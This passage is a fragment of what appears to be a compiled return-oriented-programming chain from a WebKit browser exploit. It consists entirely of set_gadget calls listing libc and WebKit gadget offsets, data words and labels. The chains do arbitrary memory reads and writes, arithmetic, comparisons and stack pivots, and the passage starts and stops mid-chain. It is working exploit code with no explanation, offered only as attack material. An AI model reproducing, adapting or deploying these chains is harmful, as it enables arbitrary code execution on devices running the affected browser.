set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+127144, //L1600 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+127112, //L1598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+127128, //L1599 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1598: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1599: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1600: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+127224, //L1601 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1601: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1603: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+127344, //L1606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+127328, //L1604 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1604: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1606: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+127488, //L1609 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+127456, //L1607 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+127472, //L1608 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1607: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1608: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1609: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+127560, //L1611 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1611: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+127616, //L1612 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1612: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+127712, //L1615 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1614: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1615: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1616: db([36, 0]); // 0x24 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+127808, //L1617 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+127824, //L1618 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1617: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1618: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+127912, //L1620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1620: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+127968, //L1621 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1621: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+128040, //L1624 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1624: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+128096, //L1625 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1625: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1627: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+128232, //L1628 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1628: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1630: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+128352, //L1633 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+128336, //L1631 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1631: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1633: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+128496, //L1636 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+128464, //L1634 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+128480, //L1635 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1634: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1635: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1636: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+128568, //L1638 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1638: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+128624, //L1639 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1639: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+128720, //L1642 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1641: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1642: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1643: db([37, 0]); // 0x25 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+128816, //L1644 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+128832, //L1645 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1644: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1645: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+128920, //L1647 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1647: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+128976, //L1648 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1648: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+129048, //L1651 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1651: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+129104, //L1652 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1652: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1654: libc_base+756185, //mov rsp, rbp ; pop rbp libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+129240, //L1655 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1655: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1657: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+129360, //L1660 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+129344, //L1658 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1658: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1660: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+129504, //L1663 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+129472, //L1661 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+129488, //L1662 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1661: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1662: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1663: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+129576, //L1665 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1665: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+129632, //L1666 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1666: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+129728, //L1669 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1668: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1669: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1670: db([38, 0]); // 0x26 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+129824, //L1671 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+129840, //L1672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1671: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1672: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+129928, //L1674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1674: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+129984, //L1675 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1675: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+130056, //L1678 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1678: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+130112, //L1679 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1679: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+130240, //L1682 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+130224, //L1681 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1681: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1682: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+130344, //L1683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+130360, //L1684 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L1683: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1684: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+130480, //L1685 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+130464, //L1686 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L1686: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L1685: db([0, 0]); // 0x0 //___sputc: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+130552, //L1688 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L1688: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+130640, //L1689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+130688, //L1692 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1689: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1690: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1691: db([0, 0]); // 0x0 set_gadget(webkit_base+568675,); //pop r8 //L1692: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+130784, //L1694 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+130768, //L1693 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1693: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1694: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+130864, //L1695 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1695: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1697: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+130984, //L1700 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+130968, //L1698 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1698: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1700: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+131096, //L1701 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+131144, //L1704 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+131112, //L1702 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1701: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1702: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1703: db([12, 0]); // 0xc set_gadget(libc_base+759608,); //pop rax //L1704: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+131248, //L1707 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+131232, //L1705 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1705: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1707: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+131424, //L1710 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+131440, //L1711 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+131392, //L1708 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+131408, //L1709 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1708: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L1709: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1710: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1711: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+131552, //L1714 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+131520, //L1712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1712: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1713: db([4294967295, 4294967295]); // -0x1 set_gadget(libc_base+759608,); //pop rax //L1714: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+131640, //L1715 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1715: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1717: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+131760, //L1720 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+131744, //L1718 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1718: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1720: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+131848, //L1721 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+131864, //L1723 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L1721: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1723: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+131920, //L1724 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1724: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1726: db([12, 0]); // 0xc set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+132104, //L1728 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+132120, //L1729 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+132088, //L1727 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1727: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1728: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1729: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+132232, //L1730 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+132264, //L1732 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+132248, //L1731 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1730: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1731: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1732: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+2115150, //setle al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+132440, //L1734 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+132456, //L1735 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+132424, //L1733 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1733: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1734: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1735: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+132616, //L1740 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+132632, //L1741 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+132568, //L1737 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1737: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1738: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L1739: db([1, 0]); // 0x1 set_gadget(webkit_base+3236123,); //pop r9 //L1740: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1741: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+132752, //L1742+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+132744, //L1742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L1742: db([0, 0]); // 0x0 set_gadgets([ ropchain+132768, //L1742+24 ropchain+137032, //L1736 libc_base+764760, //pop rsi ropchain+132808, //L1743 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1743: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1745: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+132928, //L1748 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+132912, //L1746 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1746: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1748: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+133040, //L1749 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+133088, //L1752 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+133056, //L1750 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1749: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1750: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1751: db([36, 0]); // 0x24 set_gadget(libc_base+759608,); //pop rax //L1752: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+133192, //L1755 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+133176, //L1753 